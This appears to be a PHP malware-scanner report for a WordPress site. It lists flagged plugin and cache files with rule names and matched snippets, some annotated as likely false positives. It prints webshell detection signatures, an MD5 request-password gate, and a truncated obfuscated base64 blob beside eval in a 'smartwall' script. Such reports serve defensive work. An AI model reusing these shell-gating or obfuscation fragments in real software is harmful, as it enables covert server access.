//var/www/samara/data/www/shljuhivsamara.ru/wp-content/cache/page/2bb/b73/2bbb73117846038b8ba76c464ca76736.php Size: 87.33 kB Created: 2020-11-30 18:50:32 Modified: 2020-11-30 18:50:32 Warns: 1 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 406 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"ewogICAgImhvbWV1cmwiOiAiaHR0cHM6Ly9zZXguc2hsanVoaXZzYW1hcmEucnUvIiwKICAgICJyZXN1bHRzdHlwZSI6ICJ2ZXJ0aWNhbCIsCiAgICAicmVzdWx0c3Bvc2l0aW9uIjogImhvdmVyIiwKICAgICJyZXN1bHRzU25hcFRvIjogImxlZnQiLAogICAgInJlc3VsdHMiOiB7CiAgICAgICAgIndpZHRoIjogImF1dG8iLAogICAgICAgICJ3aWR0aF90YWJsZXQiOiAiYXV0byIsCiAgICAgICAgIndpZHRoX3Bob25lIjogImF1dG8iCiAgICB9LAogICAgIml0ZW1zY291bnQiOiA0LAogICAgImltYWdld2lkdGgiOiA3MCwKICAgICJpbWFnZWhlaWdodCI6IDcwLAogICAgInJlc3VsdGl0ZW1oZWlnaHQiOiAiYXV0byIsCiAgICAic2hvd2F1dGhvciI6IDAsCiA...
| Sign 7f5d33bf Line: 406 Dangerous Malware Signature (hash: 7f5d33bf) |
jbG9zZ
| Sign a408f408 Line: 406 Dangerous Malware Signature (hash: a408f408) |
c3Rhd
| Sign ae7830db Line: 406 Dangerous Malware Signature (hash: ae7830db) |
Y2xvc2
| Sign d97f004d Line: 406 Dangerous Malware Signature (hash: d97f004d) |
zdGF0
| Sign ee1cb326 Line: 406 Dangerous Malware Signature (hash: ee1cb326) |
9wZW
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/cache/page/d76/b00/d76b002f026d76d745d3230489e8deee.php Size: 483.83 kB Created: 2020-11-30 19:00:11 Modified: 2020-11-30 19:00:11 Warns: 1 Dangers: 4
| Description | Match |
|---|
Exploit base64_long Line: 634 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"ewogICAgImhvbWV1cmwiOiAiaHR0cHM6Ly9zaGxqdWhpdnNhbWFyYS5ydS8iLAogICAgInJlc3VsdHN0eXBlIjogInZlcnRpY2FsIiwKICAgICJyZXN1bHRzcG9zaXRpb24iOiAiaG92ZXIiLAogICAgInJlc3VsdHNTbmFwVG8iOiAibGVmdCIsCiAgICAicmVzdWx0cyI6IHsKICAgICAgICAid2lkdGgiOiAiYXV0byIsCiAgICAgICAgIndpZHRoX3RhYmxldCI6ICJhdXRvIiwKICAgICAgICAid2lkdGhfcGhvbmUiOiAiYXV0byIKICAgIH0sCiAgICAiaXRlbXNjb3VudCI6IDQsCiAgICAiaW1hZ2V3aWR0aCI6IDcwLAogICAgImltYWdlaGVpZ2h0IjogNzAsCiAgICAicmVzdWx0aXRlbWhlaWdodCI6ICJhdXRvIiwKICAgICJzaG93YXV0aG9yIjogMCwKICAgICJ...
| Sign 7830f7a6 Line: 634 Dangerous Malware Signature (hash: 7830f7a6) |
N0YX
| Sign a408f408 Line: 634 Dangerous Malware Signature (hash: a408f408) |
c3Rhd
| Sign ae7830db Line: 634 Dangerous Malware Signature (hash: ae7830db) |
Y2xvc2
| Sign de12c454 Line: 634 Dangerous Malware Signature (hash: de12c454) |
vcGVu
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/cache/page/481/98e/48198eb1a23438601e793a1e3cab7160.php Size: 138.88 kB Created: 2020-11-30 18:17:01 Modified: 2020-11-30 18:17:01 Warns: 1 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 642 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"ewogICAgImhvbWV1cmwiOiAiaHR0cHM6Ly93d3cuc2hsanVoaXZzYW1hcmEucnUvIiwKICAgICJyZXN1bHRzdHlwZSI6ICJ2ZXJ0aWNhbCIsCiAgICAicmVzdWx0c3Bvc2l0aW9uIjogImhvdmVyIiwKICAgICJyZXN1bHRzU25hcFRvIjogImxlZnQiLAogICAgInJlc3VsdHMiOiB7CiAgICAgICAgIndpZHRoIjogImF1dG8iLAogICAgICAgICJ3aWR0aF90YWJsZXQiOiAiYXV0byIsCiAgICAgICAgIndpZHRoX3Bob25lIjogImF1dG8iCiAgICB9LAogICAgIml0ZW1zY291bnQiOiA0LAogICAgImltYWdld2lkdGgiOiA3MCwKICAgICJpbWFnZWhlaWdodCI6IDcwLAogICAgInJlc3VsdGl0ZW1oZWlnaHQiOiAiYXV0byIsCiAgICAic2hvd2F1dGhvciI6IDAsCiA...
| Sign 7f5d33bf Line: 642 Dangerous Malware Signature (hash: 7f5d33bf) |
jbG9zZ
| Sign a408f408 Line: 642 Dangerous Malware Signature (hash: a408f408) |
c3Rhd
| Sign ae7830db Line: 642 Dangerous Malware Signature (hash: ae7830db) |
Y2xvc2
| Sign d97f004d Line: 642 Dangerous Malware Signature (hash: d97f004d) |
zdGF0
| Sign ee1cb326 Line: 642 Dangerous Malware Signature (hash: ee1cb326) |
9wZW
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/cache/page/7af/dc5/7afdc5b579b000bbcb3318f2f2233956.php Size: 141.08 kB Created: 2020-11-30 17:45:00 Modified: 2020-11-30 17:45:00 Warns: 1 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 640 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"ewogICAgImhvbWV1cmwiOiAiaHR0cHM6Ly9zZXguc2hsanVoaXZzYW1hcmEucnUvIiwKICAgICJyZXN1bHRzdHlwZSI6ICJ2ZXJ0aWNhbCIsCiAgICAicmVzdWx0c3Bvc2l0aW9uIjogImhvdmVyIiwKICAgICJyZXN1bHRzU25hcFRvIjogImxlZnQiLAogICAgInJlc3VsdHMiOiB7CiAgICAgICAgIndpZHRoIjogImF1dG8iLAogICAgICAgICJ3aWR0aF90YWJsZXQiOiAiYXV0byIsCiAgICAgICAgIndpZHRoX3Bob25lIjogImF1dG8iCiAgICB9LAogICAgIml0ZW1zY291bnQiOiA0LAogICAgImltYWdld2lkdGgiOiA3MCwKICAgICJpbWFnZWhlaWdodCI6IDcwLAogICAgInJlc3VsdGl0ZW1oZWlnaHQiOiAiYXV0byIsCiAgICAic2hvd2F1dGhvciI6IDAsCiA...
| Sign 7f5d33bf Line: 640 Dangerous Malware Signature (hash: 7f5d33bf) |
jbG9zZ
| Sign a408f408 Line: 640 Dangerous Malware Signature (hash: a408f408) |
c3Rhd
| Sign ae7830db Line: 640 Dangerous Malware Signature (hash: ae7830db) |
Y2xvc2
| Sign d97f004d Line: 640 Dangerous Malware Signature (hash: d97f004d) |
zdGF0
| Sign ee1cb326 Line: 640 Dangerous Malware Signature (hash: ee1cb326) |
9wZW
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/cache/page/dc4/b31/dc4b31f5aa09bfba045956549be8ccfe.php Size: 216.43 kB Created: 2020-11-30 18:27:56 Modified: 2020-11-30 18:27:56 Warns: 1 Dangers: 4
| Description | Match |
|---|
Exploit base64_long Line: 780 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"ewogICAgImhvbWV1cmwiOiAiaHR0cHM6Ly9zaGxqdWhpdnNhbWFyYS5ydS8iLAogICAgInJlc3VsdHN0eXBlIjogInZlcnRpY2FsIiwKICAgICJyZXN1bHRzcG9zaXRpb24iOiAiaG92ZXIiLAogICAgInJlc3VsdHNTbmFwVG8iOiAibGVmdCIsCiAgICAicmVzdWx0cyI6IHsKICAgICAgICAid2lkdGgiOiAiYXV0byIsCiAgICAgICAgIndpZHRoX3RhYmxldCI6ICJhdXRvIiwKICAgICAgICAid2lkdGhfcGhvbmUiOiAiYXV0byIKICAgIH0sCiAgICAiaXRlbXNjb3VudCI6IDQsCiAgICAiaW1hZ2V3aWR0aCI6IDcwLAogICAgImltYWdlaGVpZ2h0IjogNzAsCiAgICAicmVzdWx0aXRlbWhlaWdodCI6ICJhdXRvIiwKICAgICJzaG93YXV0aG9yIjogMCwKICAgICJ...
| Sign 7830f7a6 Line: 780 Dangerous Malware Signature (hash: 7830f7a6) |
N0YX
| Sign a408f408 Line: 780 Dangerous Malware Signature (hash: a408f408) |
c3Rhd
| Sign ae7830db Line: 780 Dangerous Malware Signature (hash: ae7830db) |
Y2xvc2
| Sign de12c454 Line: 780 Dangerous Malware Signature (hash: de12c454) |
vcGVu
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/cache/page/3bb/19c/3bb19c70f7c5f0ad4af5714c82c4510a.php Size: 68.58 kB Created: 2020-11-30 17:50:15 Modified: 2020-11-30 17:50:15 Warns: 1 Dangers: 4
| Description | Match |
|---|
Exploit base64_long Line: 637 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"ewogICAgImhvbWV1cmwiOiAiaHR0cHM6Ly9zaGxqdWhpdnNhbWFyYS5ydS8iLAogICAgInJlc3VsdHN0eXBlIjogInZlcnRpY2FsIiwKICAgICJyZXN1bHRzcG9zaXRpb24iOiAiaG92ZXIiLAogICAgInJlc3VsdHNTbmFwVG8iOiAibGVmdCIsCiAgICAicmVzdWx0cyI6IHsKICAgICAgICAid2lkdGgiOiAiYXV0byIsCiAgICAgICAgIndpZHRoX3RhYmxldCI6ICJhdXRvIiwKICAgICAgICAid2lkdGhfcGhvbmUiOiAiYXV0byIKICAgIH0sCiAgICAiaXRlbXNjb3VudCI6IDQsCiAgICAiaW1hZ2V3aWR0aCI6IDcwLAogICAgImltYWdlaGVpZ2h0IjogNzAsCiAgICAicmVzdWx0aXRlbWhlaWdodCI6ICJhdXRvIiwKICAgICJzaG93YXV0aG9yIjogMCwKICAgICJ...
| Sign 7830f7a6 Line: 637 Dangerous Malware Signature (hash: 7830f7a6) |
N0YX
| Sign a408f408 Line: 637 Dangerous Malware Signature (hash: a408f408) |
c3Rhd
| Sign ae7830db Line: 637 Dangerous Malware Signature (hash: ae7830db) |
Y2xvc2
| Sign de12c454 Line: 637 Dangerous Malware Signature (hash: de12c454) |
vcGVu
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/cache/page/d16/b1c/d16b1c32481256cc1a44f7559efbab23.php Size: 485.85 kB Created: 2020-11-30 18:17:06 Modified: 2020-11-30 18:17:06 Warns: 1 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 635 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"ewogICAgImhvbWV1cmwiOiAiaHR0cHM6Ly9zZXguc2hsanVoaXZzYW1hcmEucnUvIiwKICAgICJyZXN1bHRzdHlwZSI6ICJ2ZXJ0aWNhbCIsCiAgICAicmVzdWx0c3Bvc2l0aW9uIjogImhvdmVyIiwKICAgICJyZXN1bHRzU25hcFRvIjogImxlZnQiLAogICAgInJlc3VsdHMiOiB7CiAgICAgICAgIndpZHRoIjogImF1dG8iLAogICAgICAgICJ3aWR0aF90YWJsZXQiOiAiYXV0byIsCiAgICAgICAgIndpZHRoX3Bob25lIjogImF1dG8iCiAgICB9LAogICAgIml0ZW1zY291bnQiOiA0LAogICAgImltYWdld2lkdGgiOiA3MCwKICAgICJpbWFnZWhlaWdodCI6IDcwLAogICAgInJlc3VsdGl0ZW1oZWlnaHQiOiAiYXV0byIsCiAgICAic2hvd2F1dGhvciI6IDAsCiA...
| Sign 7f5d33bf Line: 635 Dangerous Malware Signature (hash: 7f5d33bf) |
jbG9zZ
| Sign a408f408 Line: 635 Dangerous Malware Signature (hash: a408f408) |
c3Rhd
| Sign ae7830db Line: 635 Dangerous Malware Signature (hash: ae7830db) |
Y2xvc2
| Sign d97f004d Line: 635 Dangerous Malware Signature (hash: d97f004d) |
zdGF0
| Sign ee1cb326 Line: 635 Dangerous Malware Signature (hash: ee1cb326) |
9wZW
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/profile-builder-pro/modules/user-listing/userlisting.php Size: 128.34 kB Created: 2020-11-25 12:08:19 Modified: 2020-11-25 18:00:38 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 1185 Warning The double-variable (variable variable) technique is usually used for the obfuscation of malicious code |
${$gloabl_filter_ids_name}
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/wordpress-seo-premium/premium/classes/redirect/redirect-validator.php Size: 4.64 kB Created: 2020-11-25 12:08:19 Modified: 2020-11-25 18:00:38 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 140 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$validation_rule['validation_class']()
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OwnAssets.php Size: 44.62 kB Created: 2021-05-16 20:47:35 Modified: 2021-05-16 20:47:35 Warns: 1
| Description | Match |
|---|
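Function system Warning Potentially dangerous function `system` [https://www.php.net/system]. The match here appears to be the English word "system" followed by a parenthesis inside a translatable message string, not a call to `system()` |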
system (e.g. you are using the website for business purposes, to showcase your products and you are not using it as a blog where people leave comments to your posts).', 'wp-asset-clean-up')."\n\n". __('If you are not sure about whether activating this option is right or not, it is better to leave it as it is (to be loaded by default).', 'wp-asset-clean-up')."\n\n". __('Confirm this action to enable the unloading or cancel to leave it loaded by default.', 'wp-asset-clean-up'); $wpacuObjectData['r...
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/FontsGoogle.php Size: 23.64 kB Created: 2021-05-16 20:47:35 Modified: 2021-05-16 20:47:35 Dangers: 1
| Description | Match |
|---|
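Sign 7830f7a6 Line: 656 Dangerous Malware Signature (hash: 7830f7a6). The match is the four-character string `nc-l`, which can occur inside ordinary hyphenated names; check line 656 in context |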
nc-l
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/MinifyJs.php Size: 10.11 kB Created: 2021-05-16 20:47:35 Modified: 2021-05-16 20:47:35 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 137 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/Tools.php Size: 32.60 kB Created: 2021-05-16 20:47:35 Modified: 2021-05-16 20:47:35 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 328 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/wp-asset-clean-up-pro/pro/classes/OptimiseAssets/OptimizeJsPro.php Size: 8.80 kB Created: 2021-05-16 20:47:35 Modified: 2021-05-16 20:47:35 Dangers: 2
| Description | Match |
|---|
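Exploit execution2 Dangerous RCE (Remote Code Execution) allows remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]. In this excerpt `array_filter` is called with a single argument and `$_GET` is only passed to `array_key_exists`, so no request-supplied callback is visible; verify against the full file |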
array_filter($allPatterns); } public static function isInlineJsEnabled() { $isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] && (trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled())); if (! $isEnabledInSettingsWithListOrAuto) { return false; } if (array_key_exists('wpacu_no_inline_js', $_GET)
| Exploit execution2 Line: 36 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
array_filter($allPatterns); }
/** * @return bool */ public static function isInlineJsEnabled() { $isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] && (trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled()));
if (! $isEnabledInSettingsWithListOrAuto) { return false; }
// Deactivate it for debugging purposes via query string /?wpacu_no_inline_js if (array_key_e...
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/wp-asset-clean-up-pro/templates/_admin-page-settings-plugin-areas/_fonts-google/_optimize-area.php Size: 13.93 kB Created: 2021-05-16 20:47:35 Modified: 2021-05-16 20:47:35 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 71 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/wp-asset-clean-up-pro/vendor/rawr/t-regx/src/SafeRegex/preg.php Size: 3.43 kB Created: 2021-05-16 20:47:35 Modified: 2021-05-16 20:47:35 Dangers: 1
| Description | Match |
|---|
Sign 696317c4 Line: 27 Dangerous Malware Signature (hash: 696317c4) |
@preg_replace
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/wp-asset-clean-up-pro/vendor/matthiasmullie/minify/src/JS.php Size: 38.32 kB Created: 2021-05-16 20:47:35 Modified: 2021-05-16 20:47:35 Warns: 1
| Description | Match |
|---|
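Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec]. The match here starts inside a quoted list of names (`'test('`, `'toSource('`, `'toString('`), so `exec(` appears to be a string literal rather than a PHP call |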
exec(', 'test(', 'toSource(', 'toString(', ); $delimiters = array_fill(0, count($propertiesAndMethods), '/'); $propertiesAndMethods = array_map('preg_quote', $propertiesAndMethods, $delimiters); $after = '(?=\s*([\.,;\)\}&\|+]|\/\/|$|\.('.implode('|', $propertiesAndMethods).')))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $callback); $before = '\)\s*'; $after = '(?=\s*\.('.implode('|', $propertiesAndMethods).'))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $c...
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Helper/HTML.php Size: 24.21 kB Created: 2020-11-25 12:08:21 Modified: 2020-11-25 18:00:38 Dangers: 1
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Reader/Excel5.php Size: 285.78 kB Created: 2020-11-25 12:08:21 Modified: 2020-11-25 18:00:38 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 7576 Dangerous Hacker credits |
Hacked by
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/File.php Size: 5.87 kB Created: 2020-11-25 12:08:21 Modified: 2020-11-25 18:00:38 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 176 Dangerous Malware Signature (hash: 471b95ee) |
Suhosin
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/PCLZip/pclzip.lib.php Size: 209.23 kB Created: 2020-11-25 12:08:21 Modified: 2020-11-25 18:00:38 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2454 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2588 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3386 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3575 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5162 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/OLERead.php Size: 10.98 kB Created: 2020-11-25 12:08:21 Modified: 2020-11-25 18:00:38 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 308 Dangerous Hacker credits |
Hacked by
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/wp-all-import-pro/helpers/functions.php Size: 8.30 kB Created: 2020-11-25 12:08:21 Modified: 2020-11-25 18:00:38 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval ("return ($str);")) ? $then : $else; } } if ( ! function_exists('is_empty') ) { function is_empty( $var ) { return empty($var); } } if ( ! function_exists('pmxi_human_filesize') ) { function pmxi_human_filesize($bytes, $decimals = 2) { $sz = 'BKMGTP'; $factor = (int) floor((strlen($bytes) - 1) / 3); return sprintf("%.{$decimals}f", $bytes / pow(1024, $factor)) . (isset($sz[$factor]) ? $sz[$factor] : ''); } } if ( ! function_exists('pmxi_get_remote_image_ext') ) { function pmxi_get_remote_im...
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/wp-all-import-pro/libraries/pclzip.lib.php Size: 185.99 kB Created: 2020-11-25 12:08:21 Modified: 2020-11-25 18:00:38 Dangers: 5
| Description | Match |
|---|
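Exploit nano Line: 2458 Dangerous Nano is a family of PHP webshells which are code-golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]. The rule fires on a variable-function call; the match below invokes a callback stored in an options array under a PCLZIP_CB_* key, which may simply be this archive library's callback hook, so compare the file with a known-good copy of the plugin before treating it as a webshell. |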
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2592 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3390 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3579 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5166 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/wp-all-import-pro/actions/wp_ajax_import_failed.php Size: 799.00 B Created: 2020-11-25 12:08:21 Modified: 2020-11-25 18:00:38 Dangers: 1
| Description | Match |
|---|
Exploit extract_global Line: 12 Dangerous Code injection: extracting a global variable array into the local scope allows remote attackers to inject PHP code on the target machine via an HTTP request |
extract($_POST)
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/ajax-search-pro/includes/classes/ajax/class-asp-search.php Size: 5.79 kB Created: 2020-11-25 12:08:21 Modified: 2020-11-25 18:00:38 Dangers: 1
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/ajax-search-pro/includes/classes/core/class-asp-init.php Size: 28.14 kB Created: 2020-11-25 12:08:21 Modified: 2020-11-25 18:00:38 Dangers: 1
| Description | Match |
|---|
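Sign 7830f7a6 Line: 383 Dangerous Malware Signature (hash: 7830f7a6); the four-character match below is short enough to occur inside an ordinary hyphenated token, so inspect line 383 in context before acting on it. |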
nc-l
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/ajax-search-pro/includes/classes/etc/class-asp_helpers.php Size: 82.97 kB Created: 2020-11-25 12:08:21 Modified: 2020-11-25 18:00:38 Dangers: 1
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/include/tcpdf_colors.php Size: 14.36 kB Created: 2020-11-25 12:08:21 Modified: 2020-11-25 18:00:38 Dangers: 1
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/tcpdf_barcodes_1d.php Size: 71.69 kB Created: 2020-11-25 12:08:21 Modified: 2020-11-25 18:00:38 Warns: 3
| Description | Match |
|---|
Exploit too_many_chr Line: 1071 Warning Concatenating many `chr` calls is a technique usually used to obfuscate malicious code; the values matched here run in ascending sequence, which is more typical of a character table than of an encoded payload (confirm against the upstream TCPDF file) |
chr(0).chr(1).chr(2).chr(3).chr(4).chr(5).chr(6).chr(7).
| Exploit too_many_chr Line: 1072 Warning Concatenating many `chr` calls is a technique usually used to obfuscate malicious code |
chr(10).chr(11).chr(12).chr(13).chr(14).chr(15).chr(16).chr(17).
| Exploit too_many_chr Line: 1073 Warning Concatenating many `chr` calls is a technique usually used to obfuscate malicious code |
chr(20).chr(21).chr(22).chr(23).chr(24).chr(25).chr(26).chr(27).
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/ajax-search-pro/backend/search.php Size: 21.91 kB Created: 2020-11-25 12:08:21 Modified: 2020-11-25 18:00:38 Dangers: 1
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxonomy_term_select.class.php Size: 25.39 kB Created: 2020-11-25 12:08:22 Modified: 2020-11-25 18:00:38 Dangers: 1
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cf_search_callback.class.php Size: 6.03 kB Created: 2020-11-25 12:08:22 Modified: 2020-11-25 18:00:38 Dangers: 1
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_user_select.class.php Size: 8.51 kB Created: 2020-11-25 12:08:22 Modified: 2020-11-25 18:00:38 Dangers: 1
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxterm_search_callback.class.php Size: 5.94 kB Created: 2020-11-25 12:08:22 Modified: 2020-11-25 18:00:38 Dangers: 1
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/type.class.php Size: 5.81 kB Created: 2020-11-25 12:08:22 Modified: 2020-11-25 18:00:38 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 98 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$val['func']($this->newData)
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cpt_select.class.php Size: 7.36 kB Created: 2020-11-25 12:08:22 Modified: 2020-11-25 18:00:38 Dangers: 1
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/languageselect.class.php Size: 6.91 kB Created: 2020-11-25 12:08:22 Modified: 2020-11-25 18:00:38 Dangers: 1
| Description | Match |
|---|
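Function str_rot13 eval_str_rot13 Line: 177 Dangerous Encoded function `eval` [https://www.php.net/eval]: the match below is `eval` written in ROT13; a four-character match can also be a fragment of an unrelated word, so check line 177 in context. |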
riny
|
|
//var/www/samara/data/www/shljuhivsamara.ru/script_smartwall/update.php Size: 9.06 kB Created: 2020-11-25 12:08:05 Modified: 2020-11-25 18:08:25 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 9 Warning File protected by an MD5 password check on a request parameter, a pattern typically used in web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 9 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/samara/data/www/shljuhivsamara.ru/script_smartwall/index.php Size: 38.45 kB Created: 2020-11-25 12:08:05 Modified: 2020-11-25 18:08:25 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 19 Warning File protected by an MD5 password check on a request parameter, a pattern typically used in web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 19 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/samara/data/www/shljuhivsamara.ru/script_smartwall/smartwall.php Size: 8.87 kB Created: 2020-11-25 12:08:05 Modified: 2020-11-25 18:08:25 Warns: 2 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Line: 2 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
'bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxUAq2mWzWmlIBhaIFjWGnCWJQlSOEgDQJaBIIBYJdiDPGhLRCa83gK...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
